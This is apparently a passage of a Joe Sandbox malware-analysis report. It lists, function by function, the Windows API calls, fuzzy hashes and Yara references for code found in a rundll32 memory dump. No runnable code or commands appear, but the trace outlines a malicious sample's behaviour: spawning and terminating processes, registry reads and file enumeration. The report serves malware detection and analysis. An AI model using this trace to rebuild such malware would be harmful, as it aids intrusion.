                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                          • String ID:
                          • API String ID: 417118235-0
                          • Opcode ID: 0b509343b7f93df18f235337ca802301960b87b2769eca6af2fcb0f66fc8d684
                          • Instruction ID: 4bd024e2ab80b655d4b072a50532fd5e0fb68e92f4aa19d64cdaf09c0d0a683c
                          • Opcode Fuzzy Hash: 0b509343b7f93df18f235337ca802301960b87b2769eca6af2fcb0f66fc8d684
                          • Instruction Fuzzy Hash: BF118B31210215BFE7219F54DC8ABAA7FAAFF04315F141060F946A6180CBB9BD54DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B73193 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B7509E
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750B7
                            • Part of subcall function 05B7508C: GetCurrentThreadId.KERNEL32 ref: 05B750C4
                            • Part of subcall function 05B7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750D0
                            • Part of subcall function 05B7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750DE
                            • Part of subcall function 05B7508C: lstrcpy.KERNEL32(00000000), ref: 05B75100
                          • lstrcpy.KERNEL32(-000000FC,00000000), ref: 05B731CD
                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,05B813E7,?,?,00000000,?,05B70E77,00000000), ref: 05B731DF
                          • GetTickCount.KERNEL32 ref: 05B731EA
                          • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,05B813E7,?,?,00000000,?,05B70E77,00000000), ref: 05B731F6
                          • lstrcpy.KERNEL32(00000000), ref: 05B73210
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                          • String ID: \Low
                          • API String ID: 1629304206-4112222293
                          • Opcode ID: 5af63f9bae95f05bb5b16938654436ab8a90d5f1fc43d9a49ed3bb72a51c3d33
                          • Instruction ID: a740552f70f0e790a38a147d4c2ac4c915397477bed24f6b0883386a268c2bee
                          • Opcode Fuzzy Hash: 5af63f9bae95f05bb5b16938654436ab8a90d5f1fc43d9a49ed3bb72a51c3d33
                          • Instruction Fuzzy Hash: 1E01A931201628ABD7206AB69C49FBB7BDDEF02651F1908A0F521D3180DF28F900DAB4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B66F51 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45timeCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 05B66F64
                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 05B66F76
                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 05B66FA0
                          • WaitForMultipleObjects.KERNEL32(00000002,05B72EB3,00000000,000000FF), ref: 05B66FB3
                          • CloseHandle.KERNEL32(05B72EB3), ref: 05B66FBC
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                          • String ID: 0x%08X
                          • API String ID: 603522830-3182613153
                          • Opcode ID: c443a9d4ae5a284ec66085cbfb53bc795a3d9525d1612579fb832c742814e866
                          • Instruction ID: 33ada9254e60ffa9e0ca555d65730a3c327c3f8f0acd0c70eb31fa13af3f818b
                          • Opcode Fuzzy Hash: c443a9d4ae5a284ec66085cbfb53bc795a3d9525d1612579fb832c742814e866
                          • Instruction Fuzzy Hash: 9F014871905229BBCB10AB94DC4ADEFBF7DEF05360F104158B916A21C5EB74A601CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7D30A Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • GetLastError.KERNEL32(?,?,?,00001000,?,05B8A2F4,76CDF750), ref: 05B7D38B
                          • WaitForSingleObject.KERNEL32(00000000,00000000,?,05B8A2F4,76CDF750), ref: 05B7D410
                          • CloseHandle.KERNEL32(00000000,?,05B8A2F4,76CDF750), ref: 05B7D42A
                          • OpenProcess.KERNEL32(00100000,00000000,00000000,?,05B8A2F4,76CDF750), ref: 05B7D45F
                            • Part of subcall function 05B6D6B0: RtlReAllocateHeap.NTDLL(00000000,?,?,05B65546), ref: 05B6D6C0
                          • WaitForSingleObject.KERNEL32(?,00000064,?,05B8A2F4,76CDF750), ref: 05B7D4E1
                          • CloseHandle.KERNEL32(F0FFC983,?,05B8A2F4,76CDF750), ref: 05B7D508
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                          • String ID:
                          • API String ID: 3115907006-0
                          • Opcode ID: ac622017523a3470f75bca128bd725e15544c7bf04f713f22024d91446dd4e0f
                          • Instruction ID: 8a92e50d0c6365a62923298c7de96f2cf32cb4c8b656a937861c44d2bbb70b6e
                          • Opcode Fuzzy Hash: ac622017523a3470f75bca128bd725e15544c7bf04f713f22024d91446dd4e0f
                          • Instruction Fuzzy Hash: A3811871A00219EFDF11CFA4C984AADBBB5FF08384F158499E926AB250D731F941CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7B278 Relevance: 9.2, APIs: 6, Instructions: 200timestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • FileTimeToLocalFileTime.KERNEL32(00000000,05B72702), ref: 05B7B2DA
                          • FileTimeToSystemTime.KERNEL32(05B72702,?), ref: 05B7B2E8
                          • lstrlenW.KERNEL32(00000010), ref: 05B7B2F8
                          • lstrlenW.KERNEL32(00000218), ref: 05B7B304
                          • FileTimeToLocalFileTime.KERNEL32(00000008,05B72702), ref: 05B7B3F1
                          • FileTimeToSystemTime.KERNEL32(05B72702,?), ref: 05B7B3FF
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$File$LocalSystemlstrlen$AllocateHeap
                          • String ID:
                          • API String ID: 1122361434-0
                          • Opcode ID: b58c80450a6d90e063d88fd5e31681885c8039c622a862d2b8deae529deb812f
                          • Instruction ID: 7ab7c523789d63d1e15381abece5c63a935c527b37f71d51abb420bbdc2d8cf9
                          • Opcode Fuzzy Hash: b58c80450a6d90e063d88fd5e31681885c8039c622a862d2b8deae529deb812f
                          • Instruction Fuzzy Hash: BE71CD71A0021EABCB50DFA9D884EFEB7F9FB08314F144466F515E7241EA38EA45DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6E40F Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlImageNtHeader.NTDLL(?), ref: 05B6E428
                            • Part of subcall function 05B77A3E: lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,?,?,05B6E448,?), ref: 05B77A6A
                            • Part of subcall function 05B77A3E: RtlAllocateHeap.NTDLL(00000000,?), ref: 05B77A7C
                            • Part of subcall function 05B77A3E: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,05B6E448,?), ref: 05B77A99
                            • Part of subcall function 05B77A3E: lstrlenW.KERNEL32(00000000,?,?,05B6E448,?), ref: 05B77AA5
                            • Part of subcall function 05B77A3E: HeapFree.KERNEL32(00000000,00000000,?,?,05B6E448,?), ref: 05B77AB9
                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 05B6E460
                          • CloseHandle.KERNEL32(?), ref: 05B6E46E
                          • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 05B6E547
                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05B6E556
                          • HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 05B6E569
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                          • String ID:
                          • API String ID: 1719504581-0
                          • Opcode ID: ca49c815bbf5799d8bb766b502bebfc3d403341669e878f11c8b498208524713
                          • Instruction ID: 22e110442902b724c5b0c3cbc198b5c810cdca3ffaddee7e0e547a0896c4de48
                          • Opcode Fuzzy Hash: ca49c815bbf5799d8bb766b502bebfc3d403341669e878f11c8b498208524713
                          • Instruction Fuzzy Hash: CE416F3A600605ABDB219FA4D885EBE7F7AFB44710F1040A5F905AB250EB34FA55DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7D1DC Relevance: 9.1, APIs: 6, Instructions: 122threadCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(00000000,?), ref: 05B7D237
                          • GetLastError.KERNEL32 ref: 05B7D25D
                          • SetEvent.KERNEL32(00000000), ref: 05B7D270
                          • GetModuleHandleA.KERNEL32(00000000), ref: 05B7D2B9
                          • memset.NTDLL ref: 05B7D2CE
                          • RtlExitUserThread.NTDLL(?), ref: 05B7D303
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HandleModule$ErrorEventExitLastThreadUsermemset
                          • String ID:
                          • API String ID: 3978817377-0
                          • Opcode ID: 18eba6c67d288c6ecebce423f4cb7257eecf2d3c520513c383aa3f2c7804140e
                          • Instruction ID: 3a01018f7abec60e69e3fdd42a97c67249c1a574d54037f16445401f53bea8c7
                          • Opcode Fuzzy Hash: 18eba6c67d288c6ecebce423f4cb7257eecf2d3c520513c383aa3f2c7804140e
                          • Instruction Fuzzy Hash: 10416A71900608AFCB209FA8D888CBEBBBAFF852517644599F817D3100DB31F945CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B74F40 Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c35f3531343eee632ec70d81ece8c1ebb1071a5c99a1b9aa84d55965590c06d2
                          • Instruction ID: 3dc9adabd3570e8851183f0a29627a29da1783decfb112ef64a6de431695af77
                          • Opcode Fuzzy Hash: c35f3531343eee632ec70d81ece8c1ebb1071a5c99a1b9aa84d55965590c06d2
                          • Instruction Fuzzy Hash: FB41C0B1604718EFC730AF64888992A7FAAFB44721B104A6DF67BC71C0EB70B445CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6EABA Relevance: 9.1, APIs: 6, Instructions: 108stringsynchronizationCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B6AE7C: lstrlen.KERNEL32(05B6E448,00000000,00000000,?,?,05B77A5B,?,?,?,?,05B6E448,?), ref: 05B6AE8B
                            • Part of subcall function 05B6AE7C: mbstowcs.NTDLL ref: 05B6AEA7
                          • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 05B6EB0D
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 05B7BB1D
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 05B7BB29
                            • Part of subcall function 05B7BAD1: memset.NTDLL ref: 05B7BB71
                            • Part of subcall function 05B7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05B7BB8C
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(0000002C), ref: 05B7BBC4
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?), ref: 05B7BBCC
                            • Part of subcall function 05B7BAD1: memset.NTDLL ref: 05B7BBEF
                            • Part of subcall function 05B7BAD1: wcscpy.NTDLL ref: 05B7BC01
                          • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 05B6EB2E
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 05B6EB5A
                            • Part of subcall function 05B7BAD1: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 05B7BC27
                            • Part of subcall function 05B7BAD1: RtlEnterCriticalSection.NTDLL(?), ref: 05B7BC5D
                            • Part of subcall function 05B7BAD1: RtlLeaveCriticalSection.NTDLL(?), ref: 05B7BC79
                            • Part of subcall function 05B7BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 05B7BC92
                            • Part of subcall function 05B7BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 05B7BCA4
                            • Part of subcall function 05B7BAD1: FindClose.KERNEL32(?), ref: 05B7BCB9
                            • Part of subcall function 05B7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05B7BCCD
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(0000002C), ref: 05B7BCEF
                          • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 05B6EB77
                          • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 05B6EB98
                          • PathFindFileNameW.SHLWAPI(0000001E,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 05B6EBAD
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                          • String ID:
                          • API String ID: 2670873185-0
                          • Opcode ID: fecd49ee4cf8da22ebdf943c6ca5cd62a384da8cdd1f81c5e70a0143707ad104
                          • Instruction ID: bb1b5398d316c88e4d6d9b3abbbb4e9d78c99dde64355d9f4cb812027c59b012
                          • Opcode Fuzzy Hash: fecd49ee4cf8da22ebdf943c6ca5cd62a384da8cdd1f81c5e70a0143707ad104
                          • Instruction Fuzzy Hash: 28312E76508205AFCB10AF64C8C987FBBEEFF88294F180969F59693110DB35F909DB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7EF9F Relevance: 9.1, APIs: 6, Instructions: 93memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,00000104,05B83A4E,00000000,?,?,05B79BAD,?,00000005,?,00000000), ref: 05B7EFBB
                          • lstrlen.KERNEL32(00000000,00000104,05B83A4E,00000000,?,?,05B79BAD,?,00000005), ref: 05B7EFD1
                          • lstrlen.KERNEL32(?,00000104,05B83A4E,00000000,?,?,05B79BAD,?,00000005), ref: 05B7EFE6
                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05B7F04B
                          • _snprintf.NTDLL ref: 05B7F071
                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001,00000000), ref: 05B7F090
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Heap$AllocateFree_snprintf
                          • String ID:
                          • API String ID: 3180502281-0
                          • Opcode ID: 6b0ef65da86f0b20833afb0b0550c12af6343de1b28bc6900bdfd7c2defb9876
                          • Instruction ID: 074dc6e247c214485f50342d8cd28b4f7fd50f81b602c3be5ed56699252df5fa
                          • Opcode Fuzzy Hash: 6b0ef65da86f0b20833afb0b0550c12af6343de1b28bc6900bdfd7c2defb9876
                          • Instruction Fuzzy Hash: 4B319C3691021CFFCB20EFA4DC848BB7FAAFB44390B0194A6F925AB100D771B950DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6A976 Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON
                          Download Yara Rule
                          APIs
                          • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 05B6A990
                          • CreateWaitableTimerA.KERNEL32(05B8A1E8,00000001,?), ref: 05B6A9AD
                          • GetLastError.KERNEL32(?,00000000,05B78C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B6A9BE
                            • Part of subcall function 05B81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F02
                            • Part of subcall function 05B81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05B81F16
                            • Part of subcall function 05B81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F30
                            • Part of subcall function 05B81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05B62C89,?,?,?), ref: 05B81F5A
                          • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,05B78C06,00000000,00000000,0000801C), ref: 05B6A9FE
                          • SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,05B78C06,00000000,00000000,0000801C), ref: 05B6AA1D
                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,05B78C06,00000000,00000000,0000801C), ref: 05B6AA33
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                          • String ID:
                          • API String ID: 1835239314-0
                          • Opcode ID: eebd6ac6a4f11bad8513ac2736dd976e6d3cd7fea3ac1dd7106dca3b1531edc4
                          • Instruction ID: ed9d5f568d73791b8fe0c9d11d91f29f5ae8bdf5ef90971388d678408520c343
                          • Opcode Fuzzy Hash: eebd6ac6a4f11bad8513ac2736dd976e6d3cd7fea3ac1dd7106dca3b1531edc4
                          • Instruction Fuzzy Hash: 8E312975910108FBCF21EF95C989CAEBFBAFB85750B2490A6F405B3140D634BA40CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6F519 Relevance: 9.1, APIs: 6, Instructions: 78memoryCOMMON
                          Download Yara Rule
                          APIs
                          • StrChrA.SHLWAPI(?,00000020,00000000,?,00000000,?,?,?,05B77C35,00000000,?,?,?), ref: 05B6F531
                          • StrChrA.SHLWAPI(00000001,00000020,?,?,?,05B77C35,00000000,?,?,?), ref: 05B6F542
                            • Part of subcall function 05B61F0F: lstrlen.KERNEL32(?,?,00000000,00000000,?,05B73D4E,00000000,?,?,00000000,00000001), ref: 05B61F21
                            • Part of subcall function 05B61F0F: StrChrA.SHLWAPI(?,0000000D,?,05B73D4E,00000000,?,?,00000000,00000001), ref: 05B61F59
                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05B6F582
                          • memcpy.NTDLL(00000000,?,00000007,?,?,?,05B77C35,00000000), ref: 05B6F5AF
                          • memcpy.NTDLL(00000000,?,?,00000000,?,00000007,?,?,?,05B77C35,00000000), ref: 05B6F5BE
                          • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007,?,?,?,05B77C35,00000000), ref: 05B6F5D0
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memcpy$AllocateHeaplstrlen
                          • String ID:
                          • API String ID: 1819133394-0
                          • Opcode ID: 2202e45d311eaa218290761e30635c09cf9606b6fb3eb0780e299d8275322767
                          • Instruction ID: 65c6a405b5219b4d9fade582aefb607d3a3feb92bd743b1c051a1702612e4039
                          • Opcode Fuzzy Hash: 2202e45d311eaa218290761e30635c09cf9606b6fb3eb0780e299d8275322767
                          • Instruction Fuzzy Hash: 27217C72600109BFDB109FA8DC85FAABBADEF04254F154092FA089B151EA74FD45CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B8049A Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                          Download Yara Rule
                          APIs
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 05B804D9
                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05B804EA
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 05B80505
                          • GetLastError.KERNEL32 ref: 05B8051B
                          • HeapFree.KERNEL32(00000000,?), ref: 05B8052D
                          • HeapFree.KERNEL32(00000000,?), ref: 05B80542
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                          • String ID:
                          • API String ID: 1822509305-0
                          • Opcode ID: 53811bf025fc7207a989dfaeeef92637b20cad438c87a951faad3ade54cb5502
                          • Instruction ID: 70edc33e49104a3beced5c9cece8015263f0ba60a82136d57e05a4a6c846dfc7
                          • Opcode Fuzzy Hash: 53811bf025fc7207a989dfaeeef92637b20cad438c87a951faad3ade54cb5502
                          • Instruction Fuzzy Hash: 9411307650101CFBCB216A95DC4DCFF7F7EEF452A0B101491F515A2150DA31AA59EBE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7C8EF Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON
                          Download Yara Rule
                          APIs
                          • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 05B7C917
                          • _strupr.NTDLL ref: 05B7C952
                          • lstrlen.KERNEL32(00000000), ref: 05B7C95A
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 05B7C999
                          • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 05B7C9A0
                          • GetLastError.KERNEL32 ref: 05B7C9A8
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                          • String ID:
                          • API String ID: 110452925-0
                          • Opcode ID: 9bac6c44cfb5c32ce0978e99427e2ee6184bca2b1030b03279fead712e972ef0
                          • Instruction ID: 78b22f2abf83ebe6b9308c888a8dd420960ad1f5344255212fac3eda24e4966c
                          • Opcode Fuzzy Hash: 9bac6c44cfb5c32ce0978e99427e2ee6184bca2b1030b03279fead712e972ef0
                          • Instruction Fuzzy Hash: B3118272510208BFDB626B74DC89DBE7FAEEB88661B101459F917D3080EE75F884CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7B549 Relevance: 9.1, APIs: 6, Instructions: 66registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyA.ADVAPI32(80000001,?,76CDF710), ref: 05B7B567
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 05B7B595
                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 05B7B5A7
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 05B7B5CC
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7B5E7
                          • RegCloseKey.ADVAPI32(?), ref: 05B7B5F1
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapQueryValue$AllocateCloseFreeOpen
                          • String ID:
                          • API String ID: 170146033-0
                          • Opcode ID: 10cd1d7a1e92ca21eff3d09adcbf1a010c248e96cb83919436d15cc704afda52
                          • Instruction ID: 0fc24800f6e7309ca324b3374edc5ce46158487abf12f6b95ca4044ecfdf1d0f
                          • Opcode Fuzzy Hash: 10cd1d7a1e92ca21eff3d09adcbf1a010c248e96cb83919436d15cc704afda52
                          • Instruction Fuzzy Hash: A711F476910008FFDB119B98DC85CFEBBBEFB48644B1050A6B911E3110EB31AA05EB20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6A5E7 Relevance: 9.1, APIs: 6, Instructions: 65memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000000,76CDF730,-00000001,00000000,?,?,?,05B68EF7,?,00000000,000000FF), ref: 05B6A5F8
                          • lstrlen.KERNEL32(?,?,?,?,05B68EF7,?,00000000,000000FF), ref: 05B6A5FF
                          • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 05B6A611
                          • _snprintf.NTDLL ref: 05B6A637
                            • Part of subcall function 05B7C01F: memset.NTDLL ref: 05B7C034
                            • Part of subcall function 05B7C01F: lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 05B7C06D
                            • Part of subcall function 05B7C01F: wcstombs.NTDLL ref: 05B7C077
                            • Part of subcall function 05B7C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 05B7C0A8
                            • Part of subcall function 05B7C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,05B6A645), ref: 05B7C0D4
                            • Part of subcall function 05B7C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 05B7C0EA
                            • Part of subcall function 05B7C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,05B6A645), ref: 05B7C0FE
                            • Part of subcall function 05B7C01F: CloseHandle.KERNEL32(?), ref: 05B7C131
                            • Part of subcall function 05B7C01F: CloseHandle.KERNEL32(?), ref: 05B7C136
                          • _snprintf.NTDLL ref: 05B6A66B
                            • Part of subcall function 05B7C01F: GetLastError.KERNEL32 ref: 05B7C102
                            • Part of subcall function 05B7C01F: GetExitCodeProcess.KERNEL32(?,00000001), ref: 05B7C122
                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 05B6A688
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                          • String ID:
                          • API String ID: 1481739438-0
                          • Opcode ID: 72e2bde36913e98a622098e7997089bf1cd0ebc9d61eb63b9ae03f06eb31b5e8
